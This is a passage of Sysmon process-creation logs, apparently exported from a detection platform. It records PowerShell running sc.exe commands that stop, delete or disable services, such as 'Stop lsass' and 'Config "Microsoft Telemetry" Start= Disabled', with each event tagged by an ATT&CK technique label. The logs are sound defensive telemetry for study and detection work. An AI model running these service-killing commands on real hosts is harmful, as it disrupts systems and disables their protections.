{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.099"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-00106abe2500}"",""processId"":""7356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.214",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.038 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001029b92500} +ProcessId: 6188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.041783700Z"",""eventRecordID"":""2864"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.038\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001029b92500}\r\nProcessId: 6188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.038"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001029b92500}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.181",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.994 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106eb52500} +ProcessId: 1240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.997924200Z"",""eventRecordID"":""2862"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.994\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106eb52500}\r\nProcessId: 1240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.994"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-00106eb52500}"",""processId"":""1240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.167",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.971 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010e1b32500} +ProcessId: 7940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.974441400Z"",""eventRecordID"":""2861"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.971\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010e1b32500}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.971"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-0010e1b32500}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.121",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.920 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00103ab12500} +ProcessId: 1348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.928617200Z"",""eventRecordID"":""2858"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.920\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00103ab12500}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.920"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-00103ab12500}"",""processId"":""1348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.073",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.874 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001026ae2500} +ProcessId: 6024 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.877117700Z"",""eventRecordID"":""2855"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.874\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001026ae2500}\r\nProcessId: 6024\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.874"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-001026ae2500}"",""processId"":""6024"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.063",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.859 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001024ac2500} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Microsoft Telemetry"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Microsoft Telemetry\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.862238800Z"",""eventRecordID"":""2854"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.859\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-001024ac2500}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Microsoft Telemetry\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.859"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-001024ac2500}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 